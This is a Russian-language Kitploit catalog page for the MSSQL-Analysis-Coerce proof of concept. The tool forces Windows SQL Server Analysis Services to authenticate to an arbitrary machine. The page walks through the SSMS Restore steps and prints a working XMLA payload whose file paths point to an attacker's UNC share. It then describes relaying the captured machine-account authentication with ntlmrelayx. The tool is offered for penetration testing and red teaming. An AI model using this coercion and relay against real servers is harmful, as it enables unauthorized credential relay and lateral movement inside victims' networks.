Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MSSQL-Analysis-Coerce — Техника, позволяющая принудить Windows SQL Server к аутентификации на произвольной машине. | Kitploit
Инструменты/GitHubGitHub/p0dalirius/mssql-analysis-coerce
ЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеRed TeamingСостязательная Атака
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

Техника, позволяющая принудить Windows SQL Server к аутентификации на произвольной машине.

Репозиторий
1331352 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MSSQL Analysis Services - Принудительная аутентификация

Метод, позволяющий принудить Windows SQL Server к аутентификации на произвольной машине.

Этот proof of concept создан в соавторстве:

  • Podalirius: YouTube Channel Subscribers
  • Worty:

Доказательство концепции

Чтобы инициировать аутентификацию от имени учётной записи локальной машины, необходимо подключиться к удалённому SQL Server с использованием учётных данных пользователя:

Затем выберем пункт «Restore», чтобы восстановить базу данных из указанного файла.

Чтобы сгенерировать XMLA-файл, укажите путь к произвольному файлу в поле «Backup File» и нажмите Ok.

Затем измените путь к произвольному файлу, заменив его UNC-путём до вашего сервера атакующего (например, \\192.168.128\SYSVOL\db.abf)

XMLA-запрос proof of concept (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

И мы получаем аутентификацию от учётной записи локальной машины SQL Server:

Relaying для победы

Получив аутентификацию, мы можем ретранслировать её с помощью ntlmrelayx, чтобы выполнять множество действий от имени компьютера SQL01$.

Это круто, но вызвать данную принудительную аутентификацию с атакующей машины под управлением Linux сложно, так как у нас нет доступа к SQL Server Management Studio (SSMS).

Ссылки

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
Скачать инструмент